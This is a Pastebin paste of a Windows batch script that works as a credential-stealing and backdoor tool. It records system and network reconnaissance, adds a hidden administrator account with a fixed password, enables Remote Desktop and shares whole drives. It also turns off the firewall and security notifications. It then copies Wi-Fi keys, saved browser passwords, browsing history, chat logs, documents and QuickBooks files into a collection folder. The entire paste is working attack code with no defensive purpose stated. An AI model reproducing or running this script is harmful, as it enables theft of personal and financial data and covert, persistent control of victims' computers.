Advertisement
Guest User

Untitled

a guest
May 14th, 2017
137
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 31.71 KB | None | 0 0
  1. echo. off
  2. if exist c:\killswitch.txt goto end
  3. if not exist ..\.\Documents\%computername% mkdir ..\.\Documents\%computername% >nul
  4. set infolog=>> ..\.\Documents\%computername%\%username%.txt
  5. :Sinfo
  6. if exist "..\system\Settings\sinfodis.set" goto :SRemoteinfo
  7. echo ---------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
  8. echo -----System Info--- >> ..\.\Documents\%computername%\%username%.txt
  9. echo ---------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
  10. echo off
  11. echo Computer Name is: %computername% >> ..\.\Documents\%computername%\%username%.txt
  12. echo User Name: %username% >> ..\.\Documents\%computername%\%username%.txt
  13. echo The date and Time is: %date% %time% >> ..\.\Documents\%computername%\%username%.txt
  14. echo >> ..\.\Documents\%computername%\%username%.txt
  15. echo [+]name of the domain controller that validated the current logon session. >> ..\.\Documents\%computername%\%username%.txt
  16. echo %logonserver% >> ..\.\Documents\%computername%\%username%.txt
  17. echo >> ..\.\Documents\%computername%\%username%.txt
  18. echo [+]IP Routing tables and Gateway >> ..\.\Documents\%computername%\%username%.txt
  19. echo route pring >> ..\.\Documents\%computername%\%username%.txt
  20. echo >> ..\.\Documents\%computername%\%username%.txt
  21. echo [+] MAC Address >> ..\.\Documents\%computername%\%username%.txt
  22. echo getmac >> ..\.\Documents\%computername%\%username%.txt
  23. echo >> ..\.\Documents\%computername%\%username%.txt
  24. echo [+] Operating System type. >> ..\.\Documents\%computername%\%username%.txt
  25. echo %OS% >> ..\.\Documents\%computername%\%username%.txt
  26. echo >> ..\.\Documents\%computername%\%username%.txt
  27. echo [+]Number of Processors Installed. >> ..\.\Documents\%computername%\%username%.txt
  28. echo %NUMBER_OF_PROCESSORS% >> ..\.\Documents\%computername%\%username%.txt
  29. echo >> ..\.\Documents\%computername%\%username%.txt
  30. echo [+] List of Administrators >> ..\.\Documents\%computername%\%username%.txt
  31. net localgroup administrators >> ..\.\Documents\%computername%\%username%.txt
  32. echo off
  33. echo >> ..\.\Documents\%computername%\%username%.txt
  34. echo [+] Network adapters >> ..\.\Documents\%computername%\%username%.txt
  35. ipconfig /all >> ..\.\Documents\%computername%\%username%.txt
  36. echo >> ..\.\Documents\%computername%\%username%.txt
  37. echo [+] Task List >> ..\.\Documents\%computername%\%username%.txt
  38. tasklist >> ..\.\Documents\%computername%\%username%.txt
  39. echo >> ..\.\Documents\%computername%\%username%.txt
  40. :SRemoteInfo
  41. if exist "..\system\Settings\SremoteInfodis.set" goto :Suser
  42. echo ---------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
  43. echo ----Remote info---- >> ..\.\Documents\%computername%\%username%.txt
  44. echo ---------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
  45. echo off
  46. echo [+] Arp Information >> ..\.\Documents\%computername%\%username%.txt
  47. arp -a >> ..\.\Documents\%computername%\%username%.txt
  48. echo >> ..\.\Documents\%computername%\%username%.txt
  49. echo [+] Listed Domain Users >> ..\.\Documents\%computername%\%username%.txt
  50. net group >> ..\.\Documents\%computername%\%username%.txt
  51. echo >> ..\.\Documents\%computername%\%username%.txt
  52. echo [+] Listed Local shares >> ..\.\Documents\%computername%\%username%.txt
  53. net share >> ..\.\Documents\%computername%\%username%.txt
  54. echo >> ..\.\Documents\%computername%\%username%.txt
  55. echo [+] List of Users >> ..\.\Documents\%computername%\%username%.txt
  56. net user >> ..\.\Documents\%computername%\%username%.txt
  57. echo >> ..\.\Documents\%computername%\%username%.txt
  58. echo [+] Current Connected Users >> ..\.\Documents\%computername%\%username%.txt
  59. net use >> ..\.\Documents\%computername%\%username%.txt
  60. echo >> ..\.\Documents\%computername%\%username%.txt
  61. echo [+] Listed Current Shares with ID Tags >> ..\.\Documents\%computername%\%username%.txt
  62. net view >> ..\.\Documents\%computername%\%username%.txt
  63. echo >> ..\.\Documents\%computername%\%username%.txt
  64. echo [+] Current Machines Connected >> ..\.\Documents\%computername%\%username%.txt
  65. nbtstat -n >> ..\.\Documents\%computername%\%username%.txt
  66. :Suser
  67. if exist "..\system\Settings\suserdis.set" goto :Huser
  68. echo -------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
  69. echo -----Created System User----- >> ..\.\Documents\%computername%\%username%.txt
  70. echo -------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
  71. net user sysadmin admin /add /y >> ..\.\Documents\%computername%\%username%.txt
  72. net localgroup Administrators sysadmin /add /y >> ..\.\Documents\%computername%\%username%.txt
  73. echo Username: sysadmin >> ..\.\Documents\%computername%\%username%.txt
  74. echo Password: admin >> ..\.\Documents\%computername%\%username%.txt
  75. :Huser
  76. if exist "..\system\Settings\huserdis.set" goto :RDP
  77. echo -------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
  78. echo -----UserName Hidden From Welcome Screen----- >> ..\.\Documents\%computername%\%username%.txt
  79. echo -------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
  80. reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v sysadmin /t REG_DWORD /d 0 /f /y >> ..\.\Documents\%computername%\%username%.txt
  81. echo Done. >> ..\.\Documents\%computername%\%username%.txt
  82. :RDP
  83. if exist "..\system\Settings\RDPdis.set" goto :shares
  84. echo -------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
  85. echo -----Enabled Remote Desktop----- >> ..\.\Documents\%computername%\%username%.txt
  86. echo -------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
  87. reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0 >> ..\.\Documents\%computername%\%username%.txt
  88. echo Done. >> ..\.\Documents\%computername%\%username%.txt
  89. :shares
  90. if exist "..\system\Settings\sharesdis.set" goto :registry
  91. echo -------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
  92. echo -----Created System Shares----- >> ..\.\Documents\%computername%\%username%.txt
  93. echo -------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
  94. net share C=C: >> ..\.\Documents\%computername%\%username%.txt
  95. net share D=D: >> ..\.\Documents\%computername%\%username%.txt
  96. net share E=E: >> ..\.\Documents\%computername%\%username%.txt
  97. echo C: Created >> ..\.\Documents\%computername%\%username%.txt
  98. echo D: Created >> ..\.\Documents\%computername%\%username%.txt
  99. echo E: Created >> ..\.\Documents\%computername%\%username%.txt
  100. :Registry
  101. if exist "..\system\Settings\registrydis.set" goto :sysprotect
  102. echo -------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
  103. echo -----Registry Tweaks----- >> ..\.\Documents\%computername%\%username%.txt
  104. echo ---------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
  105. reg add "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile" /v EnableFirewall /t REG_DWORD /d 00000000 /f
  106. reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center" /v AntiVirusDisableNotify /t REG_DWORD /d 00000001 /f
  107. reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center" /v FirewallDisableNotify /t REG_DWORD /d 00000001 /f
  108. reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center" /v UpdatesDisableNotify /t REG_DWORD /d 00000001 /f
  109. reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center" /v FirewallOverride /t REG_DWORD /d 00000001 /f
  110. reg add "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile" /v DisableNotifications /t REG_DWORD /d 00000001 /f
  111. echo +Disabled MS Updates Notifications >> ..\.\Documents\%computername%\%username%.txt
  112. echo +Disabled MS AntiVirus Notifications >> ..\.\Documents\%computername%\%username%.txt
  113. echo +Disabled MS Firewall Notifications >> ..\.\Documents\%computername%\%username%.txt
  114. echo +Disabled MS Firewall >> ..\.\Documents\%computername%\%username%.txt
  115. :Sysprotect
  116. if exist "..\system\Settings\sysprotectdis.set" goto :wifikey
  117. echo -------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
  118. echo -----System Protection Disabled----- >> ..\.\Documents\%computername%\%username%.txt
  119. echo -------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
  120. net stop "Automatic Updates" /y
  121. net stop "DefWatch" /y
  122. net stop "Microsoft Firewall" /y
  123. net stop "Windows Firewall/Internet Connection Sharing (ICS)" /y
  124. net stop "security center" /y
  125. netsh firewall set opmode disable
  126. sc config wscsvc start= disabled
  127. echo Disabled Services >> ..\.\Documents\%computername%\%username%.txt
  128. echo + MS Defender >> ..\.\Documents\%computername%\%username%.txt
  129. echo + Ms Firewall >> ..\.\Documents\%computername%\%username%.txt
  130. echo + Ms Security Center >> ..\.\Documents\%computername%\%username%.txt
  131. echo + MS Update >> ..\.\Documents\%computername%\%username%.txt
  132. :WiFiKey
  133. if exist "..\system\Settings\Wifikeydis.set" goto :ieurl
  134. echo -------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
  135. echo -----Export Wireless Key----- >> ..\.\Documents\%computername%\%username%.txt
  136. echo -------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
  137. if not exist "..\.\Documents\%computername%\WifiKey" mkdir "..\.\documents\%computername%\WifiKey"
  138. ;XP
  139. reg export HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WZCSVC\Parameters\Interfaces ..\.\documents\%computername%\wifikey\wifi.reg
  140. ;Vista/win7
  141. xcopy %programdata%\Microsoft\Wlansvc\Profiles\Interfaces ..\.\documents\%computername%\wifikey\ /E
  142. echo These Keys will be encrypted, use wifi program to decrypt once you have import to right areas >> ..\.\Documents\%computername%\%username%.txt
  143. ; .\Tools\wkv.exe /stext "%computername%_wk.log" >> ..\.\Documents\%computername%\%username%.txt
  144. ; copy %computername%.html+%computername%_wk.log* >> ..\.\Documents\%computername%\%username%.txt
  145. ; del /f /q "%computername%_wk.log" >nul
  146. :IEurl
  147. if exist "..\system\Settings\ieurldis.set" goto :iepw
  148. echo -------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
  149. echo -----Registery Dump on IE Typed URLs----- >> ..\.\Documents\%computername%\%username%.txt
  150. echo -------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
  151. reg query "HKCU\Software\Microsoft\Internet Explorer\TypedURLs" >> ..\.\Documents\%computername%\%username%.txt
  152. :IEpw
  153. if exist "..\system\Settings\iepwdis.set" goto :startup
  154. echo -------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
  155. echo -----Registery Dump on IE Crypted Passwords----- >> ..\.\Documents\%computername%\%username%.txt
  156. echo -------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
  157. reg query "HKCU\Software\Microsoft\Internet Explorer\IntelliForms" >> ..\.\Documents\%computername%\%username%.txt
  158. echo Note: Create a reg Key With values and import to local machine then use software. >> ..\.\Documents\%computername%\%username%.txt
  159. :StartUp
  160. if exist "..\system\Settings\startupdis.set" goto :recent
  161. echo -------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
  162. echo -----Registery Dump on Startups----- >> ..\.\Documents\%computername%\%username%.txt
  163. echo -------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
  164. reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run >> ..\.\Documents\%computername%\%username%.txt
  165. reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Runonce >> ..\.\Documents\%computername%\%username%.txt
  166. :Recent
  167. if exist "..\system\Settings\recentdis.set" goto :text
  168. echo -------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
  169. echo -----Dump Recently Opened Files----- >> ..\.\Documents\%computername%\%username%.txt
  170. echo ---------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
  171. mkdir "..\.\Documents\%Computername%\Recently Opened"
  172. copy "%USERPROFILE%\Recent" "..\.\Documents\%Computername%\Recently Opened" /y
  173. echo Copied. >> ..\.\Documents\%computername%\%username%.txt
  174. echo Will not work on Win7. >> ..\.\Documents\%computername%\%username%.txt
  175. :Text
  176. if exist "..\system\Settings\indexdis.set" goto :index
  177. echo -------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
  178. echo -----Dump Text Documents----- >> ..\.\Documents\%computername%\%username%.txt
  179. echo ---------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
  180. MkDir ..\.\Documents\%computername%\Files
  181. set Files="..\.\Documents\%computername%\Files\" /c /q /r /h /y /i
  182. set doc=If not Exist "%USERPROFILE%\My Documents\
  183. set desk=If not Exist "%USERPROFILE%\Desktop\
  184. xcopy "%USERPROFILE%\My Documents\*.txt" %files%
  185. xcopy "%USERPROFILE%\My Documents\*.doc" %files%
  186. xcopy "%USERPROFILE%\My Documents\*.wpd" %files%
  187. xcopy "%USERPROFILE%\My Documents\*.rtf" %files%
  188. xcopy "%USERPROFILE%\My Documents\*.xls" %files%
  189. xcopy "%USERPROFILE%\My Documents\*.docx" %files%
  190. xcopy "%USERPROFILE%\My Documents\*.ppt" %files%
  191. xcopy "%USERPROFILE%\My Documents\*.pptx" %files%
  192. xcopy "%USERPROFILE%\My Documents\*.mdb" %files%
  193. xcopy "%USERPROFILE%\My Documents\*.csv" %files%
  194. xcopy "%USERPROFILE%\My Documents\*.log" %files%
  195. xcopy "%USERPROFILE%\Desktop\*.txt" %files%
  196. xcopy "%USERPROFILE%\Desktop\*.doc" %files%
  197. xcopy "%USERPROFILE%\Desktop\*.wpd" %files%
  198. xcopy "%USERPROFILE%\Desktop\*.rtf" %files%
  199. xcopy "%USERPROFILE%\Desktop\*.xls" %files%
  200. xcopy "%USERPROFILE%\Desktop\*.docx" %files%
  201. xcopy "%USERPROFILE%\Desktop\*.ppt" %files%
  202. xcopy "%USERPROFILE%\Desktop\*.pptx" %files%
  203. xcopy "%USERPROFILE%\Desktop\*.mdb" %files%
  204. xcopy "%USERPROFILE%\Desktop\*.csv" %files%
  205. %desk%*.txt" (echo Text Files Not Found. >> ..\.\Documents\%computername%\%username%.txt) ELSE (echo Text Files Found. >> ..\.\Documents\%computername%\%username%.txt)
  206. %desk%*.doc" (echo Document Files Not Found. >> ..\.\Documents\%computername%\%username%.txt) ELSE (echo Document Files Found. >> ..\.\Documents\%computername%\%username%.txt)
  207. %desk%*.wpd" (echo WordPad Files Not Found. >> ..\.\Documents\%computername%\%username%.txt) ELSE (echo WordPad Files Found. >> ..\.\Documents\%computername%\%username%.txt)
  208. %desk%*.rtf" (echo Rich Text File Not Found. >> ..\.\Documents\%computername%\%username%.txt) ELSE (echo Rich Text File Found. >> ..\.\Documents\%computername%\%username%.txt)
  209. %desk%*.xls" (echo Microsoft Excel Files Not Found. >> ..\.\Documents\%computername%\%username%.txt) ELSE (echo Microsoft Excel Files Found. >> ..\.\Documents\%computername%\%username%.txt)
  210. %desk%*.docx" (echo Document Files Not Found. >> ..\.\Documents\%computername%\%username%.txt) ELSE (echo Document Files Found. >> ..\.\Documents\%computername%\%username%.txt)
  211. %desk%*.ppt" (echo Microsoft PowerPoint Files Not Found. >> ..\.\Documents\%computername%\%username%.txt) ELSE (echo Microsoft PowerPoint Files Found. >> ..\.\Documents\%computername%\%username%.txt)
  212. %desk%*.pptx" (echo Microsoft PowerPoint Files Not Found. >> ..\.\Documents\%computername%\%username%.txt) ELSE (echo Microsoft PowerPoint Files Found. >> ..\.\Documents\%computername%\%username%.txt)
  213. %desk%*.mdb" (echo Microsoft Access Files Not Found. >> ..\.\Documents\%computername%\%username%.txt) ELSE (echo Microsoft Access Files Found. >> ..\.\Documents\%computername%\%username%.txt)
  214. %desk%*.csv" (echo comma-separated value Files Not Found. >> ..\.\Documents\%computername%\%username%.txt) ELSE (echo comma-separated value Files Found. >> ..\.\Documents\%computername%\%username%.txt)
  215. %desk%*.log" (echo Log Files Not Found. >> ..\.\Documents\%computername%\%username%.txt) ELSE (echo Log Files Found. >> ..\.\Documents\%computername%\%username%.txt)
  216. :index
  217. if exist "..\system\Settings\indexdis.set" goto :iefavs
  218. if not exist "..\.\Documents\%computer%\IEindex" mkdir "..\.\Documents\%computer%"
  219. echo -------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
  220. echo -----Dump IE History index.dat File----- >> ..\.\Documents\%computername%\%username%.txt
  221. echo -------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
  222. ;Win7/Vista
  223. attrib -r -a -s -h "%userprofile%\appdata\\Roaming\Microsoft\Windows\Cookies\index.dat"
  224. copy /Y "%userprofile%\appdata\Roaming\Microsoft\Windows\Cookies\index.dat" "..\.\Documents\%computer%\IEindex\index1.dat'
  225. attrib -a -r -s -h "%userprofile%\appdata\\Roaming\Microsoft\Windows\Cookies\Low\index.dat"
  226. copy /Y "%userprofile%\appdata\Roaming\Microsoft\Windows\Cookies\Low\index.dat" "..\.\Documents\%computer%\IEindex\index2.dat"
  227. attrib -r -a -s -h "%userprofile%\appdata\\Local\Microsoft\Windows\History\History.IE5\index.dat"
  228. copy /Y "%userprofile%\appdata\Local\Microsoft\Windows\History\History.IE5\index.dat" "..\.\Documents\%computer%\IEindex\index3.dat"
  229. attrib -r -a -s -h "%userprofile%\appdata\\Local\Microsoft\Windows\History\History.IE5\Low\index.dat"
  230. copy /Y "%userprofile%\appdata\Local\Microsoft\Windows\History\History.IE5\Low\index.dat" "..\.\Documents\%computer%\IEindex\index4.dat"
  231. attrib -r -a -s -h "%userprofile%\appdata\\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\index.dat"
  232. copy /Y "%userprofile%\appdata\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\index.dat" "..\.\Documents\%computer%\IEindex\index7.dat"
  233. attrib -r -a -s -h "%userprofile%\appdata\\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\index.dat"
  234. copy /Y "%userprofile%\appdata\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\index.dat" "..\.\Documents\%computer%\IEindex\index8.dat"
  235. attrib -r -a -s -h "%userprofile%\appdata\\Roaming\Microsoft\Internet Explorer\UserData\index.dat"
  236. copy /Y "%userprofile%\appdata\Roaming\Microsoft\Internet Explorer\UserData\index.dat" "..\.\Documents\%computer%\IEindex\index9.dat"
  237. attrib -r -a -s -h "%userprofile%\appdata\\Roaming\Microsoft\Internet Explorer\UserData\Low\index.dat"
  238. copy /Y "%userprofile%\appdata\Roaming\Microsoft\Internet Explorer\UserData\Low\index.dat" "..\.\Documents\%computer%\IEindex\index0.dat"
  239. ;WinXP/2000
  240. attrib -r -a -s -h "%userprofile%\Cookies\index.dat"
  241. copy /Y "%userprofile%\Cookies\index.dat" "..\.\Documents\%computername%\index1.dat"
  242. attrib -r -a -s -h %userprofile%\Local Settings\History\History.IE5\index.dat"
  243. copy /Y "%userprofile%\Local Settings\History\History.IE5\index.dat" "..\.\Documents\%computername%\index2.dat"
  244. attrib -r -a -s -h %userprofile%\Local Settings\Temporary Internet Files\Content.IE5\index.dat"
  245. copy /Y "%userprofile%\Local Settings\Temporary Internet Files\Content.IE5\index.dat" "..\.\Documents\%computername%\index4.dat"
  246. attrib -r -a -s -h "%userprofile%\UserData\index.dat"
  247. copy /Y "%userprofile%\UserData\index.dat" "..\.\Documents\%computername%\index5.dat"
  248. :IEfavs
  249. if exist "..\system\Settings\iefavsdis.set" goto :chat
  250. echo -------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
  251. echo -----Dump Internet Explorer Favorites----- >> ..\.\Documents\%computername%\%username%.txt
  252. echo -------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
  253. set interb="..\.\Documents\%computername%\InternetBroswers
  254. if exist "%APPDATA%\Mozilla\Firefox\*" mkdir "%interb%\FireFox" && echo FireFox Found. >> ..\.\Documents\%computername%\%username%.txt
  255. if exist "%APPDATA%\Thunderbird\*" mkdir "%interb%\Thunderbird" && echo Thunderbird Found. >> ..\.\Documents\%computername%\%username%.txt
  256. if exist "%APPDATA%\netscape\NSB\*" mkdir "%interb%\netScape" && echo netScape Found. >> ..\.\Documents\%computername%\%username%.txt
  257. if exist "%APPDATA%\Opera\Opera\*" mkdir "%interb%\Opera" && echo Opera Found. >> ..\.\Documents\%computername%\%username%.txt
  258. if exist "%USERPROFILE%\Favorites\*" mkdir "%interb%\IExplorer\" && echo MS IE Found. >> ..\.\Documents\%computername%\%username%.txt
  259. xcopy "%USERPROFILE%\Favorites\*" "%interb%\IExplorer\" /s /c /q /r /h /y /i
  260. xcopy "%APPDATA%\netscape\NSB\Profiles\*.db" "%interb%\netScape\" /s /c /q /r /h /y /i
  261. xcopy "%APPDATA%\netscape\NSB\Profiles\*.dat" "%interb%\netScape\" /s /c /q /r /h /y /i
  262. xcopy "%APPDATA%\netscape\NSB\Profiles\*bookmarks.html" "%interb%\netScape\" /s /c /q /r /h /y /i
  263. xcopy "%APPDATA%\Opera\Opera\profile\*.dat" "%interb%\Opera\" /s /c /q /r /h /y /i
  264. xcopy "%APPDATA%\Opera\Opera\mail\*.dat" "%interb%\Opera\" /s /c /q /r /h /y /i
  265. xcopy "%APPDATA%\Opera\Opera\mail\*.ini" "%interb%\Opera\" /s /c /q /r /h /y /i
  266. xcopy "%APPDATA%\Mozilla\Firefox\Profiles\*signons*" "%interb%\FireFox\" /s /c /q /r /h /y /i
  267. xcopy "%APPDATA%\Mozilla\Firefox\Profiles\*default*.txt" "%interb%\FireFox\" /s /c /q /r /h /y /i
  268. xcopy "%APPDATA%\Mozilla\Firefox\Profiles\*.db" "%interb%\FireFox\" /s /c /q /r /h /y /i
  269. xcopy "%APPDATA%\Mozilla\Firefox\Profiles\*default*\*.db" "%interb%\FireFox\" /s /c /q /r /h /y /i
  270. xcopy "%APPDATA%\Mozilla\Firefox\Profiles\*.html" "%interb%\FireFox" /s /c /q /r /h /y /i
  271. xcopy "%APPDATA%\Thunderbird\Profiles\*" "%interb%\ThunderBird\*" /s /c /q /r /h /y /i
  272. :chat
  273. if exist "..\system\Settings\chatdis.set" goto :QB
  274. echo -------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
  275. echo -----Dump Chat Logs----- >> ..\.\Documents\%computername%\%username%.txt
  276. echo ---------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
  277. set chatlog=..\.\Documents\%computername%\ChatLogs
  278. Mkdir %chatlog%
  279. if exist "%USERPROFILE%\My Documents\My Received Files\*" mkdir "%chatlog%\MSN" && echo MSN Found. >> ..\.\Documents\%computername%\%username%.txt
  280. if exist "%APPDATA%\Skype\*" mkdir "%chatlog%\Skype" && echo Skype Found. >> ..\.\Documents\%computername%\%username%.txt
  281. if exist "%programfiles%\Trillian\*" mkdir "%chatlog%\Trillian" && echo Trillian Found. >> ..\.\Documents\%computername%\%username%.txt
  282. if exist "%programfiles%\Yahoo!\Messenger\*" mkdir "%chatlog%\Yahoo*" && echo Yahoo Found. >> ..\.\Documents\%computername%\%username%.txt
  283. if exist "%programfiles%\Miranda\*" mkdir "%chatlog%\Miranda" && echo Miranda Found. >> ..\.\Documents\%computername%\%username%.txt
  284. if exist "%APPDATA%\gaim\*" mkdir "%chatlog%\gaim" && echo Gaim Found. >> ..\.\Documents\%computername%\%username%.txt
  285. if exist "%USERPROFILE%\My Documents\ICQ Lite\*" mkdir "%chatlog%\ICQ" && echo ICQ Found. >> ..\.\Documents\%computername%\%username%.txt
  286. if exist "%APPDATA%\*purple*" mkdir "%chatlog%\Pidgin" && echo Pidgin Found. >> ..\.\Documents\%computername%\%username%.txt
  287. if exist "%APPDATA%\MySpace*\IM\Logs\*" mkdir "%chatlog%\MySpace\" && echo MySpace Found. >> ..\.\Documents\%computername%\%username%.txt
  288. if exist "%APPDATA%\mIRC\logs\*.*" mkdir "%chatlog%\Mirc\" && echo Mirc found. >> ..\.\Documents\%computername%\%username%.txt
  289. if exist "%APPDATA%\xfire\*" mkdir "%chatlog%\xFire\" && echo xFire Found. >> ..\.\Documents\%computername%\%username%.txt
  290. if exist "%PROGRAMFILES%\AIM*" mkdir "%chatlog%\AIM\" && echo AIM found. >> ..\.\Documents\%computername%\%username%.txt
  291. xcopy "%USERPROFILE%\My Documents\My AIM Logs\*" "%chatlog%\AIM\*" /s /c /q /r /h /y
  292. xcopy "%APPDATA%\JAMS\*" "%chatlog%\AIM\*" /s /c /q /r /h /y
  293. xcopy "%APPDATA%\Mirc\logs\*.log" "%chatlog%\Mirc\*" /s /c /q /r /h /y
  294. xcopy "%APPDATA%\MySpace*\IM\Logs\*" "%chatlog%\MySpace\*" /s /c /q /r /h /y
  295. xcopy "%APPDATA%\Skype\*" "%chatlog%\Skype\*" /s /c /q /r /h /y
  296. xcopy "%programfiles%\Trillian\users\default\logs\*.log" "%chatlog%\Trilian\" /s /c /q /r /h /y
  297. xcopy "%programfiles%\Yahoo!\Messenger\Profiles\*" "%chatlog%\Yahoo!\" /s /c /q /r /h /y
  298. xcopy "%APPDATA%\Miranda\*" "%chatlog%\Miranda\*" /s /c /q /r /h /y
  299. xcopy "%APPDATA%\*gaim\*.txt" "%chatlog%\Gaim\" /s /c /q /r /h /y
  300. xcopy "%APPDATA%\*gaim\*.xml" "%chatlog%\Gaim\" /s /c /q /r /h /y
  301. xcopy "%USERPROFILE%\My Documents\ICQ Lite\*" "%chatlog%\ICQ\*" /s /c /q /r /h /y
  302. xcopy "%APPDATA%\.purple\*" "%chatlog%\Pidgin\*" /s /c /q /r /h /y
  303. xcopy "%APPDATA%\Xfire\chatlog\*.*" "%Chatlog%\xfire\*.*" /s /c /q /r /h /y
  304. :QB
  305. if exist "..\system\Settings\QBdis.set" goto :noip
  306. echo ---------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
  307. echo -----Dump Quick Books Files----- >> ..\.\Documents\%computername%\%username%.txt
  308. echo ---------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
  309. if exist "%USERPROFILE%\My Documents\*.QB*" MkDir ..\.\Documents\%computername%\QuickBooks
  310. xcopy "%USERPROFILE%\My Documents\*.t05" %~d0\Documents\%computername%\QuickBooks\ /c /q /r /h /y
  311. xcopy "%USERPROFILE%\My Documents\*.QDB" %~d0\Documents\%computername%\QuickBooks\ /c /q /r /h /y
  312. xcopy "%USERPROFILE%\My Documents\*.QDT" %~d0\Documents\%computername%\QuickBooks\ /c /q /r /h /y
  313. xcopy "%USERPROFILE%\My Documents\*.QBA" %~d0\Documents\%computername%\QuickBooks\ /c /q /r /h /y
  314. xcopy "%USERPROFILE%\My Documents\*.QBB" %~d0\Documents\%computername%\QuickBooks\ /c /q /r /h /y
  315. xcopy "%USERPROFILE%\My Documents\*.QBM" %~d0\Documents\%computername%\QuickBooks\ /c /q /r /h /y
  316. xcopy "%USERPROFILE%\My Documents\*.QBW" %~d0\Documents\%computername%\QuickBooks\ /c /q /r /h /y
  317. xcopy "%USERPROFILE%\My Documents\*.QBX" %~d0\Documents\%computername%\QuickBooks\ /c /q /r /h /y
  318. xcopy "%USERPROFILE%\My Documents\*.QBY" %~d0\Documents\%computername%\QuickBooks\ /c /q /r /h /y
  319. :noip
  320. if exist "..\system\Settings\noipdis.set" goto :aim
  321. echo ---------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
  322. echo -----Dump Registry/Logs Entry No-IP----- >> ..\.\Documents\%computername%\%username%.txt
  323. echo ---------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
  324. mkdir "..\.\documents\%computername%\NoIP"
  325. reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Vitalwerks\DUC\" >> ..\.\Documents\noip\Import.reg
  326. xcopy "%ProgramFiles%\No-IP\*.log" "..\.\Documents\%computername%\NoIP\*.log" /c /q /r /h /y
  327. echo Use Import.reg and import into registry then startup no-ip program >> ..\.\Documents\noip\ReadMe.txt
  328. :aim
  329. if exist "..\system\Settings\aimdis.set" goto :googletalk
  330. echo ---------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
  331. echo -----Dump Registry Entry AIM Encrypted ----- >> ..\.\Documents\%computername%\%username%.txt
  332. echo ---------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
  333. reg query "HKEY_CURRENT_USER\Software\America Online\AIM6\Passwords" >> ..\.\Documents\%computername%\%username%.txt
  334. echo Need Testing. >> ..\.\Documents\%computername%\%username%.txt
  335. :googletalk
  336. if exist "..\system\Settings\googletalkdis.set" goto :thumbs
  337. echo ---------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
  338. echo -----Dump Registry Entry Google Talk ----- >> ..\.\Documents\%computername%\%username%.txt
  339. echo ---------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
  340. reg query "HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts" >> ..\.\Documents\%computername%\%username%.txt
  341. echo Need Testing. >> ..\.\Documents\%computername%\%username%.txt
  342. :thumbs
  343. if exist "..\system\settings\thumbsdis.set" goto :backdoor
